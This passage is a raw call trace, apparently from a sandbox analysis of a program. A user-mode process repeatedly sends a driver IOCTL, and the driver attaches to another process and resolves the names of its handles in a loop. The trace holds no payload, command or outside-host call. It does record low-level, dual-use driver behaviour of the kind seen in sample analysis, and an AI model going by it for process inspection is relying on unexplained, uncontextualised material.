lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.383] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.383] PsAcquireProcessExitSynchronization () returned 0x0 [0221.383] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.383] ObReferenceObjectByHandle (in: Handle=0x258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013e11a0, HandleInformation=0x0) returned 0x0 [0221.383] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.383] PsReleaseProcessExitSynchronization () returned 0x2 [0221.383] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.383] ObQueryNameString (in: Object=0xfffff8a0013e11a0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.383] ObfDereferenceObject (Object=0xfffff8a0013e11a0) returned 0x1 [0221.383] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.383] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.384] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.384] PsAcquireProcessExitSynchronization () returned 0x0 [0221.384] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.384] ObReferenceObjectByHandle (in: Handle=0x268, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013f0e00, HandleInformation=0x0) returned 0x0 [0221.384] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.384] PsReleaseProcessExitSynchronization () returned 0x2 [0221.384] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.384] ObQueryNameString (in: Object=0xfffff8a0013f0e00, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.384] ObfDereferenceObject (Object=0xfffff8a0013f0e00) returned 0x1 [0221.384] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.384] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.384] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.384] PsAcquireProcessExitSynchronization () returned 0x0 [0221.384] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.384] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013f7fc0, HandleInformation=0x0) returned 0x0 [0221.385] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.385] PsReleaseProcessExitSynchronization () returned 0x2 [0221.385] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.385] ObQueryNameString (in: Object=0xfffff8a0013f7fc0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.385] ObfDereferenceObject (Object=0xfffff8a0013f7fc0) returned 0x1 [0221.385] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.385] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.385] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.385] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.385] PsAcquireProcessExitSynchronization () returned 0x0 [0221.385] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.386] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0012d5b50, HandleInformation=0x0) returned 0x0 [0221.386] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.386] PsReleaseProcessExitSynchronization () returned 0x2 [0221.386] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.386] ObQueryNameString (in: Object=0xfffff8a0012d5b50, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.386] ObfDereferenceObject (Object=0xfffff8a0012d5b50) returned 0x1 [0221.386] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.386] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.386] PsAcquireProcessExitSynchronization () returned 0x0 [0221.386] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.386] ObReferenceObjectByHandle (in: Handle=0x288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00123f560, HandleInformation=0x0) returned 0x0 [0221.386] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.387] PsReleaseProcessExitSynchronization () returned 0x2 [0221.387] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.387] ObQueryNameString (in: Object=0xfffff8a00123f560, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.387] ObfDereferenceObject (Object=0xfffff8a00123f560) returned 0x1 [0221.387] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.387] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.387] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.387] PsAcquireProcessExitSynchronization () returned 0x0 [0221.387] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.387] ObReferenceObjectByHandle (in: Handle=0x28c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f86700, HandleInformation=0x0) returned 0x0 [0221.387] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.388] PsReleaseProcessExitSynchronization () returned 0x2 [0221.388] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.388] ObQueryNameString (in: Object=0xfffff8a000f86700, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.388] ObfDereferenceObject (Object=0xfffff8a000f86700) returned 0x1 [0221.388] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.388] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.388] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.388] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.388] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.388] PsAcquireProcessExitSynchronization () returned 0x0 [0221.388] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.388] ObReferenceObjectByHandle (in: Handle=0x290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001295e10, HandleInformation=0x0) returned 0x0 [0221.388] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.388] PsReleaseProcessExitSynchronization () returned 0x2 [0221.389] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.389] ObQueryNameString (in: Object=0xfffff8a001295e10, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.389] ObfDereferenceObject (Object=0xfffff8a001295e10) returned 0x1 [0221.389] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.389] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.389] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.389] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.389] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.389] PsAcquireProcessExitSynchronization () returned 0x0 [0221.389] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.389] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0012565f0, HandleInformation=0x0) returned 0x0 [0221.389] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.389] PsReleaseProcessExitSynchronization () returned 0x2 [0221.389] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.389] ObQueryNameString (in: Object=0xfffff8a0012565f0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.389] ObfDereferenceObject (Object=0xfffff8a0012565f0) returned 0x1 [0221.390] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.390] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.390] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.390] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.390] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.390] PsAcquireProcessExitSynchronization () returned 0x0 [0221.390] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.390] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00124d9a0, HandleInformation=0x0) returned 0x0 [0221.390] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.390] PsReleaseProcessExitSynchronization () returned 0x2 [0221.390] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.390] ObQueryNameString (in: Object=0xfffff8a00124d9a0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.390] ObfDereferenceObject (Object=0xfffff8a00124d9a0) returned 0x1 [0221.390] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.390] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.390] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.390] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.390] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.390] PsAcquireProcessExitSynchronization () returned 0x0 [0221.390] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.391] ObReferenceObjectByHandle (in: Handle=0x29c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013bf060, HandleInformation=0x0) returned 0x0 [0221.391] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.391] PsReleaseProcessExitSynchronization () returned 0x2 [0221.391] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.391] ObQueryNameString (in: Object=0xfffff8a0013bf060, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.391] ObfDereferenceObject (Object=0xfffff8a0013bf060) returned 0x1 [0221.391] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.391] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.391] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.391] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.391] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.391] PsAcquireProcessExitSynchronization () returned 0x0 [0221.391] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.391] ObReferenceObjectByHandle (in: Handle=0x2a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001226d00, HandleInformation=0x0) returned 0x0 [0221.391] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.391] PsReleaseProcessExitSynchronization () returned 0x2 [0221.391] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.391] ObQueryNameString (in: Object=0xfffff8a001226d00, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.391] ObfDereferenceObject (Object=0xfffff8a001226d00) returned 0x1 [0221.392] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.392] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.392] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.392] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.392] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.392] PsAcquireProcessExitSynchronization () returned 0x0 [0221.392] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.392] ObReferenceObjectByHandle (in: Handle=0x2a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001232060, HandleInformation=0x0) returned 0x0 [0221.392] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.392] PsReleaseProcessExitSynchronization () returned 0x2 [0221.392] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.392] ObQueryNameString (in: Object=0xfffff8a001232060, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.392] ObfDereferenceObject (Object=0xfffff8a001232060) returned 0x1 [0221.392] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.392] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.392] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.392] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.392] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.392] PsAcquireProcessExitSynchronization () returned 0x0 [0221.393] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.393] ObReferenceObjectByHandle (in: Handle=0x2a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001254f80, HandleInformation=0x0) returned 0x0 [0221.393] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.393] PsReleaseProcessExitSynchronization () returned 0x2 [0221.393] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.860] ObQueryNameString (in: Object=0xfffff8a001254f80, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.860] ObfDereferenceObject (Object=0xfffff8a001254f80) returned 0x1 [0221.860] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.860] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.860] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.860] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.860] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.860] PsAcquireProcessExitSynchronization () returned 0x0 [0221.860] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.860] ObReferenceObjectByHandle (in: Handle=0x2ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001419fc0, HandleInformation=0x0) returned 0x0 [0221.860] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.861] PsReleaseProcessExitSynchronization () returned 0x2 [0221.861] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.861] ObQueryNameString (in: Object=0xfffff8a001419fc0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.861] ObfDereferenceObject (Object=0xfffff8a001419fc0) returned 0x1 [0221.861] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.861] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.861] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.861] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.861] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.861] PsAcquireProcessExitSynchronization () returned 0x0 [0221.861] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.861] ObReferenceObjectByHandle (in: Handle=0x2b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013eccf0, HandleInformation=0x0) returned 0x0 [0221.861] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.861] PsReleaseProcessExitSynchronization () returned 0x2 [0221.861] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.862] ObQueryNameString (in: Object=0xfffff8a0013eccf0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.862] ObfDereferenceObject (Object=0xfffff8a0013eccf0) returned 0x1 [0221.862] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.862] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.862] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.862] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.862] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.862] PsAcquireProcessExitSynchronization () returned 0x0 [0221.862] 